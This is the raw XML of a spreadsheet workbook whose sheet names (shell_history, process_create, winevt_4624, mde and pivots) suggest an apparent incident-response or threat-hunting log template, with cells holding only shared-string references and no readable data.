      <c r="C77" s="1" t="s">
        <v>157</v>
      </c>
      <c r="D77" s="1" t="s">
        <v>101</v>
      </c>
      <c r="E77" s="1"/>
      <c r="L77" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="78" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C78" s="1" t="s">
        <v>193</v>
      </c>
      <c r="D78" s="1" t="s">
        <v>100</v>
      </c>
      <c r="E78" s="1"/>
      <c r="L78" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="79" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D79" s="1" t="s">
        <v>98</v>
      </c>
      <c r="E79" s="1"/>
      <c r="L79" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="80" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D80" s="1" t="s">
        <v>99</v>
      </c>
      <c r="E80" s="1"/>
      <c r="L80" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="81" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C81" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D81" s="1" t="s">
        <v>96</v>
      </c>
      <c r="E81" s="1"/>
      <c r="L81" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="82" spans="3:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C82" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D82" s="1" t="s">
        <v>97</v>
      </c>
      <c r="E82" s="1"/>
      <c r="L82" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="83" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D83" s="1" t="s">
        <v>92</v>
      </c>
      <c r="E83" s="1"/>
      <c r="L83" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="84" spans="3:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C84" s="1" t="s">
        <v>183</v>
      </c>
      <c r="D84" s="1" t="s">
        <v>91</v>
      </c>
      <c r="E84" s="1"/>
      <c r="L84" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="85" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C85" s="1" t="s">
        <v>163</v>
      </c>
      <c r="D85" s="1" t="s">
        <v>93</v>
      </c>
      <c r="E85" s="1"/>
      <c r="L85" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="86" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C86" s="1" t="s">
        <v>194</v>
      </c>
      <c r="D86" s="1" t="s">
        <v>94</v>
      </c>
      <c r="E86" s="1"/>
      <c r="L86" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="87" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C87" s="1" t="s">
        <v>195</v>
      </c>
      <c r="D87" s="1" t="s">
        <v>95</v>
      </c>
      <c r="E87" s="1"/>
      <c r="L87" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="88" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D88" s="1" t="s">
        <v>125</v>
      </c>
      <c r="E88" s="1"/>
      <c r="L88" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="89" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D89" s="1" t="s">
        <v>126</v>
      </c>
      <c r="E89" s="1"/>
      <c r="L89" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="90" spans="3:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C90" s="1" t="s">
        <v>179</v>
      </c>
      <c r="D90" s="1" t="s">
        <v>127</v>
      </c>
      <c r="E90" s="1"/>
      <c r="L90" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="91" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C91" s="1" t="s">
        <v>177</v>
      </c>
      <c r="D91" s="1" t="s">
        <v>128</v>
      </c>
      <c r="E91" s="1"/>
      <c r="L91" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="92" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C92" s="1" t="s">
        <v>151</v>
      </c>
      <c r="D92" s="1" t="s">
        <v>129</v>
      </c>
      <c r="E92" s="1"/>
      <c r="L92" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="93" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C93" s="1" t="s">
        <v>165</v>
      </c>
      <c r="D93" s="1" t="s">
        <v>130</v>
      </c>
      <c r="E93" s="1"/>
      <c r="L93" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="94" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D94" s="1" t="s">
        <v>131</v>
      </c>
      <c r="E94" s="1"/>
      <c r="L94" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="95" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D95" s="1" t="s">
        <v>132</v>
      </c>
      <c r="E95" s="1"/>
      <c r="L95" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="96" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D96" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E96" s="1"/>
      <c r="L96" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="97" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D97" s="1" t="s">
        <v>134</v>
      </c>
      <c r="E97" s="1"/>
      <c r="L97" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="98" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C98" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D98" s="1" t="s">
        <v>135</v>
      </c>
      <c r="E98" s="1"/>
      <c r="L98" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="99" spans="3:12" ht="34" x14ac:dyDescent="0.2">
      <c r="C99" s="1" t="s">
        <v>196</v>
      </c>
      <c r="D99" s="1" t="s">
        <v>136</v>
      </c>
      <c r="E99" s="1"/>
      <c r="L99" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="100" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C100" s="1" t="s">
        <v>197</v>
      </c>
      <c r="D100" s="1" t="s">
        <v>132</v>
      </c>
      <c r="E100" s="1"/>
      <c r="L100" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="101" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C101" s="1" t="s">
        <v>197</v>
      </c>
      <c r="D101" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E101" s="1"/>
      <c r="L101" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="102" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C102" s="1" t="s">
        <v>197</v>
      </c>
      <c r="D102" s="1" t="s">
        <v>134</v>
      </c>
      <c r="E102" s="1"/>
      <c r="L102" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="103" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D103" s="1" t="s">
        <v>137</v>
      </c>
      <c r="E103" s="1"/>
      <c r="L103" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="104" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C104" s="1" t="s">
        <v>165</v>
      </c>
      <c r="D104" s="1" t="s">
        <v>138</v>
      </c>
      <c r="E104" s="1"/>
      <c r="L104" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="105" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C105" s="1" t="s">
        <v>183</v>
      </c>
      <c r="D105" s="1" t="s">
        <v>139</v>
      </c>
      <c r="E105" s="1"/>
      <c r="L105" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="106" spans="3:12" ht="51" x14ac:dyDescent="0.2">
      <c r="C106" s="1" t="s">
        <v>198</v>
      </c>
      <c r="D106" s="1" t="s">
        <v>140</v>
      </c>
      <c r="E106" s="1"/>
      <c r="L106" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="107" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C107" s="1" t="s">
        <v>171</v>
      </c>
      <c r="D107" s="1" t="s">
        <v>141</v>
      </c>
      <c r="E107" s="1"/>
      <c r="L107" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="108" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D108" s="1" t="s">
        <v>142</v>
      </c>
      <c r="E108" s="1"/>
      <c r="L108" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="109" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D109" s="1" t="s">
        <v>143</v>
      </c>
      <c r="E109" s="1"/>
      <c r="L109" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="110" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D110" s="1" t="s">
        <v>144</v>
      </c>
      <c r="E110" s="1"/>
      <c r="L110" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="111" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C111" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D111" s="1" t="s">
        <v>145</v>
      </c>
      <c r="E111" s="1"/>
      <c r="L111" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="112" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C112" s="1" t="s">
        <v>161</v>
      </c>
      <c r="D112" s="1" t="s">
        <v>146</v>
      </c>
      <c r="E112" s="1"/>
      <c r="L112" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="113" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C113" s="1" t="s">
        <v>192</v>
      </c>
      <c r="D113" s="1" t="s">
        <v>147</v>
      </c>
      <c r="E113" s="1"/>
      <c r="L113" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="114" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C114" s="1" t="s">
        <v>199</v>
      </c>
      <c r="D114" s="1" t="s">
        <v>148</v>
      </c>
      <c r="E114" s="1"/>
      <c r="L114" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="115" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C115" s="1" t="s">
        <v>200</v>
      </c>
      <c r="D115" s="1" t="s">
        <v>149</v>
      </c>
      <c r="E115" s="1"/>
      <c r="L115" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="116" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D116" s="1" t="s">
        <v>154</v>
      </c>
      <c r="E116" s="1"/>
      <c r="L116" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="117" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D117" s="1" t="s">
        <v>153</v>
      </c>
      <c r="E117" s="1"/>
      <c r="L117" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="118" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C118" s="1" t="s">
        <v>171</v>
      </c>
      <c r="D118" s="1" t="s">
        <v>150</v>
      </c>
      <c r="E118" s="1"/>
      <c r="L118" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="119" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C119" s="1" t="s">
        <v>151</v>
      </c>
      <c r="D119" s="1" t="s">
        <v>152</v>
      </c>
      <c r="E119" s="1"/>
      <c r="L119" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="120" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D120" s="1" t="s">
        <v>201</v>
      </c>
      <c r="E120" s="1"/>
      <c r="L120" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="121" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C121" s="1" t="s">
        <v>194</v>
      </c>
      <c r="D121" s="1" t="s">
        <v>202</v>
      </c>
      <c r="E121" s="1"/>
      <c r="L121" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="122" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C122" s="1" t="s">
        <v>181</v>
      </c>
      <c r="D122" s="1" t="s">
        <v>201</v>
      </c>
      <c r="E122" s="1"/>
      <c r="L122" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="123" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C123" s="1" t="s">
        <v>163</v>
      </c>
      <c r="D123" s="1" t="s">
        <v>203</v>
      </c>
      <c r="E123" s="1"/>
      <c r="L123" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="124" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C124" s="1" t="s">
        <v>168</v>
      </c>
      <c r="D124" s="1" t="s">
        <v>204</v>
      </c>
      <c r="E124" s="1"/>
      <c r="L124" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="125" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D125" s="1" t="s">
        <v>205</v>
      </c>
      <c r="E125" s="1"/>
      <c r="L125" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="126" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D126" s="1" t="s">
        <v>206</v>
      </c>
      <c r="E126" s="1"/>
      <c r="L126" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="127" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D127" s="1" t="s">
        <v>207</v>
      </c>
      <c r="E127" s="1"/>
      <c r="L127" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="128" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C128" s="1" t="s">
        <v>171</v>
      </c>
      <c r="D128" s="1" t="s">
        <v>208</v>
      </c>
      <c r="E128" s="1"/>
      <c r="L128" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="129" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="C129" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D129" s="1" t="s">
        <v>209</v>
      </c>
      <c r="E129" s="1"/>
      <c r="L129" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="130" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D130" s="1" t="s">
        <v>210</v>
      </c>
      <c r="E130" s="1"/>
      <c r="L130" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="131" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D131" s="1" t="s">
        <v>211</v>
      </c>
      <c r="E131" s="1"/>
      <c r="L131" s="1" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="132" spans="3:12" ht="289" x14ac:dyDescent="0.2">
      <c r="D132" s="1" t="s">
        <v>213</v>
      </c>
      <c r="E132" s="1"/>
      <c r="L132" s="1" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="133" spans="3:12" ht="51" x14ac:dyDescent="0.2">
      <c r="D133" s="1" t="s">
        <v>214</v>
      </c>
      <c r="E133" s="1"/>
      <c r="L133" s="1" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="134" spans="3:12" ht="119" x14ac:dyDescent="0.2">
      <c r="D134" s="1" t="s">
        <v>215</v>
      </c>
      <c r="E134" s="1"/>
      <c r="L134" s="1" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="135" spans="3:12" ht="102" x14ac:dyDescent="0.2">
      <c r="C135" s="1" t="s">
        <v>219</v>
      </c>
      <c r="D135" s="1" t="s">
        <v>218</v>
      </c>
      <c r="E135" s="1"/>
      <c r="L135" s="1" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="136" spans="3:12" ht="306" x14ac:dyDescent="0.2">
      <c r="D136" s="1" t="s">
        <v>220</v>
      </c>
      <c r="E136" s="1"/>
      <c r="L136" s="1" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="137" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D137" s="1" t="s">
        <v>221</v>
      </c>
      <c r="E137" s="1"/>
      <c r="L137" s="1" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="138" spans="3:12" ht="17" x14ac:dyDescent="0.2">
      <c r="D138" s="1" t="s">
        <v>223</v>
      </c>
      <c r="E138" s="1"/>
      <c r="L138" s="1" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="139" spans="3:12" ht="51" x14ac:dyDescent="0.2">
      <c r="D139" s="1" t="s">
        <v>224</v>
      </c>
      <c r="E139" s="1"/>
      <c r="L139" s="1" t="s">
        <v>212</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8701A-34C1-694C-BD7B-B9EA00ECE591}">
  <dimension ref="A1:K2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="H20" sqref="H20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" customWidth="1"/>
    <col min="2" max="2" width="11" customWidth="1"/>
    <col min="3" max="3" width="12.83203125" customWidth="1"/>
    <col min="4" max="4" width="13.6640625" customWidth="1"/>
    <col min="5" max="5" width="34.83203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="13.33203125" customWidth="1"/>
    <col min="7" max="7" width="27.5" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="74.1640625" customWidth="1"/>
    <col min="11" max="11" width="150.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A1" s="6" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="6" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="6" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E1" s="6" t="s">
        <v>26</v>
      </c>
      <c r="F1" s="6" t="s">
        <v>27</v>
      </c>
      <c r="G1" s="6" t="s">
        <v>28</v>
      </c>
      <c r="H1" s="6" t="s">
        <v>29</v>
      </c>
      <c r="I1" s="6" t="s">
        <v>30</v>
      </c>
      <c r="J1" s="6" t="s">
        <v>31</v>
      </c>
      <c r="K1" s="6" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:11" x14ac:dyDescent="0.2">
      <c r="I2" s="1"/>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F2AE5-5FB3-2247-8F3F-BB9788663E70}">
  <dimension ref="A1:J2"/>
  <sheetViews>
    <sheetView topLeftCell="E1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="F2" sqref="F2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13.83203125" customWidth="1"/>
    <col min="2" max="2" width="21" customWidth="1"/>
    <col min="3" max="3" width="33.1640625" style="1" customWidth="1"/>
    <col min="4" max="4" width="14.5" customWidth="1"/>
    <col min="5" max="5" width="53.83203125" customWidth="1"/>
    <col min="6" max="7" width="25.1640625" customWidth="1"/>
    <col min="8" max="8" width="33.6640625" style="1" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="25.1640625" customWidth="1"/>
    <col min="10" max="10" width="147.83203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="8" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="13" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="8" t="s">
        <v>15</v>
      </c>
      <c r="E1" s="8" t="s">
        <v>18</v>
      </c>
      <c r="F1" s="8" t="s">
        <v>19</v>
      </c>
      <c r="G1" s="8" t="s">
        <v>34</v>
      </c>
      <c r="H1" s="13" t="s">
        <v>40</v>
      </c>
      <c r="I1" s="8" t="s">
        <v>2</v>
      </c>
      <c r="J1" s="8" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.2">
      <c r="E2" s="1"/>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08094-03D3-F242-BFAD-3D6BF09CACB6}">
  <dimension ref="A1:I2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:I2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="18.6640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="19.6640625" customWidth="1"/>
    <col min="3" max="3" width="29" customWidth="1"/>
    <col min="4" max="4" width="12.33203125" customWidth="1"/>
    <col min="5" max="7" width="21" customWidth="1"/>
    <col min="8" max="8" width="35.1640625" customWidth="1"/>
    <col min="9" max="9" width="136.6640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A1" s="7" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="7" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="7" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="7" t="s">
        <v>23</v>
      </c>
      <c r="E1" s="7" t="s">
        <v>24</v>
      </c>
      <c r="F1" s="7" t="s">
        <v>32</v>
      </c>
      <c r="G1" s="7" t="s">
        <v>22</v>
      </c>
      <c r="H1" s="7" t="s">
        <v>5</v>
      </c>
      <c r="I1" s="7" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:9" ht="17" customHeight="1" x14ac:dyDescent="0.2"/>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33C91-8A3B-444D-AD5E-9DDFC484FADA}">
  <dimension ref="A1:I1"/>
  <sheetViews>
    <sheetView topLeftCell="B1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:I2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="2" width="15.33203125" customWidth="1"/>
    <col min="3" max="3" width="36.1640625" customWidth="1"/>
    <col min="4" max="4" width="69" style="1" customWidth="1"/>
    <col min="5" max="5" width="17.1640625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="15.1640625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="12" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="20.5" customWidth="1"/>
    <col min="9" max="9" width="116" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="11" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="11" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="11" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="12" t="s">
        <v>37</v>
      </c>
      <c r="E1" s="11" t="s">
        <v>39</v>
      </c>
      <c r="F1" s="11" t="s">
        <v>35</v>
      </c>
      <c r="G1" s="11" t="s">
        <v>36</v>
      </c>
      <c r="H1" s="11" t="s">
        <v>5</v>
      </c>
      <c r="I1" s="11" t="s">
        <v>7</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FC8D0-37F4-D143-BA93-59E1CCDB5F2E}">
  <dimension ref="A1:J2"/>
  <sheetViews>
    <sheetView topLeftCell="G1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:J2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.33203125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="11" customWidth="1"/>
    <col min="3" max="4" width="34.1640625" customWidth="1"/>
    <col min="5" max="5" width="17.83203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="90" customWidth="1"/>
    <col min="7" max="7" width="24.33203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="30.6640625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="42.33203125" style="1" customWidth="1"/>
    <col min="10" max="10" width="150.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>33</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>1</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>38</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>31</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2" s="1"/>
      <c r="F2" s="1"/>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9C52C-640B-CF44-8F28-42BC59DA89EE}">
  <dimension ref="A1:H4"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="D3" sqref="D3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.83203125" customWidth="1"/>
    <col min="2" max="2" width="19.5" customWidth="1"/>
    <col min="3" max="3" width="55.83203125" style="1" customWidth="1"/>
    <col min="4" max="4" width="25.83203125" customWidth="1"/>
    <col min="5" max="5" width="20" customWidth="1"/>
    <col min="6" max="6" width="17.33203125" customWidth="1"/>
    <col min="7" max="7" width="74" style="1" customWidth="1"/>
    <col min="8" max="8" width="150.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="9" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="9" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="10" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>13</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>14</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>20</v>
      </c>
      <c r="G1" s="10" t="s">
        <v>21</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:8" ht="187" x14ac:dyDescent="0.2">
      <c r="C2" s="1" t="s">
        <v>188</v>
      </c>
      <c r="G2" s="1" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="3" spans="1:8" ht="323" x14ac:dyDescent="0.2">
      <c r="C3" s="1" t="s">
        <v>217</v>
      </c>
      <c r="G3" s="1" t="s">
        <v>216</v>
      </c>
      <c r="H3" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="4" spans="1:8" ht="51" x14ac:dyDescent="0.2">
      <c r="G4" s="1" t="s">
        <v>222</v>
      </c>
      <c r="H4" t="s">
        <v>212</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87956-36B5-3A4B-81A2-CA08B1F3354E}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A4" sqref="A4:A20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3"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shell_history</vt:lpstr>
      <vt:lpstr>process_create</vt:lpstr>
      <vt:lpstr>process_access</vt:lpstr>
      <vt:lpstr>file_event</vt:lpstr>
      <vt:lpstr>winevt_4624</vt:lpstr>
      <vt:lpstr>winevt_7045</vt:lpstr>
      <vt:lpstr>mde</vt:lpstr>
      <vt:lpstr>generic</vt:lpstr>
      <vt:lpstr>pc_pivot</vt:lpstr>
      <vt:lpstr>pa_pivot</vt:lpstr>
      <vt:lpstr>file_pivot</vt:lpstr>
      <vt:lpstr>gen_pivot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Harvey Wargo</dc:creator>
  <cp:lastModifiedBy>Harvey Wargo</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-26T10:20:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-13T10:43:09Z</dcterms:modified>
</cp:coreProperties>
</file>